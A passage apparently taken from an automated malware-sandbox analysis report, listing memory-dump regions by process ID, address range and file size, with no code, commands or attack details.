                                                                                                                                                                                                                                                                                    • memory/3176-804-0x00007FF79FE80000-0x00007FF7A04F4000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      6.5MB

                                                                                                                                                                                                                                                                                    • memory/3660-349-0x0000000005030000-0x000000000504A000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      104KB

                                                                                                                                                                                                                                                                                    • memory/3660-355-0x000000000CD70000-0x000000000CE22000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      712KB

                                                                                                                                                                                                                                                                                    • memory/3660-360-0x000000000D2A0000-0x000000000D2EE000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      312KB

                                                                                                                                                                                                                                                                                    • memory/3660-271-0x0000000006280000-0x00000000062CC000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                                    • memory/3660-280-0x00000000026F0000-0x00000000026F8000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                                                                                    • memory/3660-281-0x0000000007790000-0x0000000007888000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      992KB

                                                                                                                                                                                                                                                                                    • memory/3660-348-0x00000000082C0000-0x0000000008414000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      1.3MB

                                                                                                                                                                                                                                                                                    • memory/3660-266-0x0000000005BB0000-0x0000000005F04000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                                                                    • memory/3660-352-0x0000000008460000-0x000000000846A000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                                                                    • memory/3660-354-0x000000000CC60000-0x000000000CCB0000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      320KB

                                                                                                                                                                                                                                                                                    • memory/3660-357-0x000000000D000000-0x000000000D1C2000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      1.8MB

                                                                                                                                                                                                                                                                                    • memory/3660-279-0x0000000007540000-0x00000000075D2000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      584KB

                                                                                                                                                                                                                                                                                    • memory/3660-400-0x000000000D540000-0x000000000D552000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      72KB

                                                                                                                                                                                                                                                                                    • memory/3660-401-0x000000000D5A0000-0x000000000D5DC000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      240KB

                                                                                                                                                                                                                                                                                    • memory/3684-259-0x00000000007A0000-0x0000000000C65000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                                                                                    • memory/3700-539-0x000001752DE60000-0x000001752E022000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      1.8MB

                                                                                                                                                                                                                                                                                    • memory/3896-612-0x0000000000410000-0x000000000048B000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      492KB

                                                                                                                                                                                                                                                                                    • memory/3896-205-0x0000000000410000-0x000000000048B000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      492KB

                                                                                                                                                                                                                                                                                    • memory/3896-223-0x0000000000410000-0x000000000048B000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      492KB

                                                                                                                                                                                                                                                                                    • memory/3896-241-0x0000000000410000-0x000000000048B000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      492KB

                                                                                                                                                                                                                                                                                    • memory/3896-403-0x0000000000410000-0x000000000048B000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      492KB

                                                                                                                                                                                                                                                                                    • memory/3896-201-0x00000000734D0000-0x0000000073761000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2.6MB

                                                                                                                                                                                                                                                                                    • memory/4048-64-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      400KB

                                                                                                                                                                                                                                                                                    • memory/4048-63-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      400KB

                                                                                                                                                                                                                                                                                    • memory/4116-705-0x0000000073770000-0x00000000737BF000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      316KB

                                                                                                                                                                                                                                                                                    • memory/4116-398-0x00000000008E0000-0x000000000097E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      632KB

                                                                                                                                                                                                                                                                                    • memory/4116-402-0x0000000073770000-0x00000000737BF000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      316KB

                                                                                                                                                                                                                                                                                    • memory/4116-404-0x00007FFB31F50000-0x00007FFB32145000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                                                                                                    • memory/4116-399-0x0000000000980000-0x0000000000BBD000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2.2MB

                                                                                                                                                                                                                                                                                    • memory/4484-506-0x000001CDC7B60000-0x000001CDC7B82000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                                                                                    • memory/4604-343-0x0000000007450000-0x0000000007458000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                                                                                    • memory/4604-294-0x000000006F240000-0x000000006F28C000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                                    • memory/4604-338-0x0000000007460000-0x000000000747A000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      104KB

                                                                                                                                                                                                                                                                                    • memory/4604-337-0x0000000007360000-0x0000000007374000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                                                    • memory/4604-336-0x0000000007350000-0x000000000735E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      56KB

                                                                                                                                                                                                                                                                                    • memory/4604-328-0x0000000007320000-0x0000000007331000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      68KB

                                                                                                                                                                                                                                                                                    • memory/4604-320-0x0000000007170000-0x000000000717A000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                                                                    • memory/4604-312-0x0000000007070000-0x0000000007113000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      652KB

                                                                                                                                                                                                                                                                                    • memory/4604-293-0x0000000006F80000-0x0000000006FB2000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      200KB

                                                                                                                                                                                                                                                                                    • memory/4604-304-0x0000000006F60000-0x0000000006F7E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                                    • memory/5184-602-0x00000000000E0000-0x0000000000584000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.6MB

                                                                                                                                                                                                                                                                                    • memory/5184-564-0x00000000000E0000-0x0000000000584000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.6MB

                                                                                                                                                                                                                                                                                    • memory/5376-805-0x0000000000C50000-0x00000000010F4000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.6MB

                                                                                                                                                                                                                                                                                    • memory/5376-844-0x0000000000C50000-0x00000000010F4000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.6MB

                                                                                                                                                                                                                                                                                    • memory/5560-19-0x00000000079F0000-0x000000000806A000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      6.5MB

                                                                                                                                                                                                                                                                                    • memory/5560-20-0x00000000067F0000-0x000000000680A000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      104KB

                                                                                                                                                                                                                                                                                    • memory/5560-2-0x0000000002CC0000-0x0000000002CF6000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      216KB

                                                                                                                                                                                                                                                                                    • memory/5560-4-0x0000000005310000-0x0000000005332000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                                                                                    • memory/5560-22-0x0000000007790000-0x0000000007826000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      600KB

                                                                                                                                                                                                                                                                                    • memory/5560-5-0x0000000005C00000-0x0000000005C66000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      408KB

                                                                                                                                                                                                                                                                                    • memory/5560-6-0x0000000005C70000-0x0000000005CD6000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      408KB

                                                                                                                                                                                                                                                                                    • memory/5560-16-0x0000000005DE0000-0x0000000006134000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                                                                    • memory/5560-17-0x00000000062B0000-0x00000000062CE000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                                    • memory/5560-18-0x0000000006300000-0x000000000634C000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                                    • memory/5560-24-0x0000000008620000-0x0000000008BC4000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                    • memory/5560-23-0x0000000007720000-0x0000000007742000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                                                                                    • memory/5560-3-0x00000000055D0000-0x0000000005BF8000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      6.2MB

                                                                                                                                                                                                                                                                                    • memory/5572-675-0x0000000000A60000-0x0000000000F25000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                                                                                    • memory/5572-703-0x0000000000A60000-0x0000000000F25000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                                                                                    • memory/5756-457-0x0000000073770000-0x00000000737BF000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      316KB

                                                                                                                                                                                                                                                                                    • memory/5756-456-0x00007FFB31F50000-0x00007FFB32145000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                                                                                                    • memory/5768-387-0x0000000073770000-0x00000000737BF000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      316KB

                                                                                                                                                                                                                                                                                    • memory/5768-386-0x0000000000970000-0x0000000000BAD000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2.2MB

                                                                                                                                                                                                                                                                                    • memory/5768-388-0x00007FFB31F50000-0x00007FFB32145000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                                                                                                    • memory/5768-383-0x00000000008D0000-0x000000000096E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      632KB

                                                                                                                                                                                                                                                                                    • memory/5848-138-0x00007FFB31F50000-0x00007FFB32145000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                                                                                                    • memory/5848-130-0x00000000009E0000-0x0000000000A7E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      632KB

                                                                                                                                                                                                                                                                                    • memory/5848-134-0x0000000000A80000-0x0000000000CBD000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2.2MB

                                                                                                                                                                                                                                                                                    • memory/5848-137-0x0000000073560000-0x00000000735AF000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      316KB

                                                                                                                                                                                                                                                                                    • memory/5968-157-0x0000000000880000-0x000000000091E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      632KB

                                                                                                                                                                                                                                                                                    • memory/5968-161-0x0000000000920000-0x0000000000B5D000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2.2MB

                                                                                                                                                                                                                                                                                    • memory/5968-164-0x0000000073770000-0x00000000737BF000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      316KB

                                                                                                                                                                                                                                                                                    • memory/5968-165-0x00007FFB31F50000-0x00007FFB32145000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                                                                                                    • memory/5968-200-0x0000000073770000-0x00000000737BF000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      316KB

                                                                                                                                                                                                                                                                                    • memory/6084-716-0x0000000000400000-0x0000000000417000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      92KB

                                                                                                                                                                                                                                                                                    • memory/6136-1408-0x0000000000C30000-0x00000000010A0000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.4MB

                                                                                                                                                                                                                                                                                    • memory/6136-1404-0x0000000000C30000-0x00000000010A0000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.4MB

                                                                                                                                                                                                                                                                                    • memory/6136-858-0x0000000000C30000-0x00000000010A0000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.4MB

                                                                                                                                                                                                                                                                                    • memory/6136-861-0x0000000000C30000-0x00000000010A0000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.4MB

                                                                                                                                                                                                                                                                                    • memory/6136-832-0x0000000000C30000-0x00000000010A0000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.4MB

                                                                                                                                                                                                                                                                                    • memory/6236-1518-0x0000000000400000-0x00000000008C1000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                                                                                    • memory/6236-1303-0x0000000000400000-0x00000000008C1000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                                                                                    • memory/6368-1385-0x000000006F580000-0x000000006F8D4000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                                                                    • memory/6368-1384-0x000000006F240000-0x000000006F28C000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                                    • memory/6368-1395-0x00000000073F0000-0x0000000007493000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      652KB

                                                                                                                                                                                                                                                                                    • memory/6916-4373-0x00000174E9570000-0x00000174E95BC000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                                    • memory/6916-1546-0x00000174D04D0000-0x00000174D0578000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      672KB

                                                                                                                                                                                                                                                                                    • memory/6916-1549-0x00000174E9620000-0x00000174E972C000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                                                    • memory/6916-4372-0x00000174E9510000-0x00000174E9566000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      344KB

                                                                                                                                                                                                                                                                                    • memory/6916-4444-0x00000174E95C0000-0x00000174E9614000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      336KB

                                                                                                                                                                                                                                                                                    • memory/7720-5553-0x00000000051D0000-0x0000000005226000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      344KB

                                                                                                                                                                                                                                                                                    • memory/7720-5554-0x0000000005260000-0x0000000005324000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      784KB

                                                                                                                                                                                                                                                                                    • memory/7720-5791-0x0000000006310000-0x00000000063F0000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      896KB

                                                                                                                                                                                                                                                                                    • memory/7720-5798-0x00000000073A0000-0x000000000747E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      888KB

                                                                                                                                                                                                                                                                                    • memory/7720-5801-0x0000000007790000-0x000000000786E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      888KB

                                                                                                                                                                                                                                                                                    • memory/7868-5531-0x0000000000130000-0x00000000005DA000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.7MB

                                                                                                                                                                                                                                                                                    • memory/7868-5536-0x0000000000130000-0x00000000005DA000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4.7MB